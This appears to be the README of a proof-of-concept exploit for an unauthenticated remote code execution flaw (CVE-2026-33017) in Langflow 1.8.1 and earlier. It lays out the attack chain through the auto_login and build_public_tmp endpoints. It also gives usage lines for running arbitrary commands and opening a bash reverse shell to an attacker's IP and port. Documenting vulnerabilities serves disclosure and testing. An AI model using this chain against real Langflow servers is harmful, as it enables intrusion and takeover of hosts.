## https://sploitus.com/exploit?id=7E546C23-E21F-556B-8183-8AD2AFD37BAC
# CVE-2026-33017-Langflow-RCE-PoC
The vulnerability in Langflow 1.8.1 and earlier allows a remote, unauthenticated attacker to achieve arbitrary command execution on the host.
## Description
The `POST /api/v1/build_public_tmp/{flow_id}/flow` endpoint permits anyone to build public flows without authentication.
By supplying the optional data parameter, an attacker can override the stored flow with their own crafted definition, embedding arbitrary Python code within node configurations. This user-controlled code is executed via exec() with no sandboxing or validation, leading to unauthenticated remote code execution.
## Affected Versions
Langflow 1.8.1 and earlier
## Features
- Creating a public flow if `AUTO_LOGIN=true`
- Exploit Execution: Execute arbitrary commands.
- Reverse Shell: Initiate a bash-based reverse shell.
## Prerequisites
- The target Langflow instance has at least one public flow (common in demos, chatbots, or shared workflows)
- One public flowโs UUID (can be obtained from shared links/URLs)
- No authentication is required
When `AUTO_LOGIN=true` (default configuration), an unauthenticated attacker can satisfy all conditions:
- `GET /api/v1/auto_login` โ obtain a superuser token
- `POST /api/v1/flows/` โ create a public flow
- Trigger the exploit via `build_public_tmp` without any authentication
## Usage
python cve-2026-33017.py [options]
Options:
-p PORT, --port PORT: SSH port (default: 7860)
-id FLOW_ID, --flow_id FLOW_ID: Public Flow ID (a new one will be created if omitted)
-c COMMAND, --command COMMAND: Custom command to execute
--shell: Launch a reverse shell
--lhost LHOST: Attacker's IP for reverse shell
--lport LPORT: Attacker's port for reverse shell (default: 4444)
-t TIMEOUT, --timeout TIMEOUT: Connection timeout in seconds (default: 5)
## Examples:
### Execute a command:
python cve-2026-33017.py 127.0.0.1 -c 'touch /tmp/pwned.txt'
### Initiate a reverse shell:
python cve-2026-33017 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
## References
[GitHub Advisory](https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx)
[NVD CVE-2026-33017](https://nvd.nist.gov/vuln/detail/CVE-2026-33017)
[Medium](https://medium.com/@aviral23/cve-2026-33017-how-i-found-an-unauthenticated-rce-in-langflow-by-reading-the-code-they-already-dc96cdce5896)
## โ ๏ธ Disclaimer
This PoC is for **educational and research purposes only**. Use it at your own risk. The author is not responsible for any misuse or damage caused.